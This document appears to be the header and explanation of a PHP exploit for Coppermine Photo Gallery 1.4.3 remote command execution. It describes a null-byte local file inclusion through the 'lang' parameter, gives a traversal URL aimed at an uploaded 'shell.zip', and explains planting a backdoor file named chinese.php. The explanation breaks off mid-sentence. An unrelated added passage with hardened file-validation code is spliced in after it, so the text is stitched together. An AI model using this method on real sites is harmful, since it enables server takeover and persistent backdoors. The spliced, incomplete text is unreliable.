<?php
# ---cpg_143_incl_xpl.php 15.38 04/12/2005 #
# #
# Coppermine Photo Gallery <= 1.4.3 remote commands execution #
# coded by rgod #
# site: http://retrogod.altervista.org #
# #
# -> this works regardless of any php.ini settings, you need a normal user #
# account with upload rights in personal albums and at least one album #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "The direct and the indirect lead on to each other in turn. It is #
# like moving in a circle--you never come to an end. Who can exhaust the #
# possibilities of their combination?" #

/* a short explanation: arbitrary local file inclusion issue in the "lang"
argument in init.inc.php, e.g.:

http://[target]/[path]/thumbnails.php?lang=../album/userpics/10002/shell.zip%00
(via a null byte; this works regardless of the magic_quotes_gpc setting,
because Coppermine's own code disables magic quotes)

we need to upload a malicious .zip file with php code inside to a personal
album folder (no check on file content) and to include it (cycling through
folders we will search for it - a subfolder is created in the album/userpics/
dir, numbered like this: 10000 + db userid).
We don't see any output when including it, so the .zip file installs a backdoor
called chinese.php inside the Coppermine lang/ dir. Modify the .zip file code
if you need. After the first run, if it succeeded, you can launch commands manually:


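For contrast with the include described above, here is a hardened way to resolve a user-supplied "lang" value, as an added example that is not rgod's code and not Coppermine's own init.inc.php (the function name, the lang/ directory layout with one .php file per language, and the english.php default are assumed):

```php
<?php
// Added example (not from the exploit above or from Coppermine): a resolver for
// a request-supplied "lang" value that applies the checks whose absence the
// description above relies on. Paths, names and the default are assumptions.

function resolve_lang_file(string $requested, string $lang_dir): ?string
{
    // 1. Reject a null byte outright: older PHP versions truncate an include
    //    path at "\0", which is what turns "...shell.zip%00" into an include
    //    of shell.zip.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // 2. Accept only an identifier-like name: no "/", "\" or "." characters,
    //    so the value cannot climb out of lang/ into album/userpics/.
    if (!preg_match('/^[a-z0-9_]{1,32}$/i', $requested)) {
        return null;
    }
    // 3. Allow-list: the name must match an existing .php file directly in lang/.
    $available = [];
    foreach (glob(rtrim($lang_dir, '/') . '/*.php') as $path) {
        $available[basename($path, '.php')] = realpath($path);
    }
    if (!isset($available[$requested]) || $available[$requested] === false) {
        return null;
    }
    // 4. Belt and braces: the resolved path must still sit inside lang/.
    $base = realpath($lang_dir);
    if ($base === false
        || strpos($available[$requested], $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $available[$requested];
}

// Usage (assumed call site): fall back to a fixed default language instead of
// trusting the request when validation fails, and log nothing attacker-controlled.
$lang_file = resolve_lang_file($_GET['lang'] ?? 'english', __DIR__ . '/lang')
          ?? __DIR__ . '/lang/english.php';
include $lang_file;
```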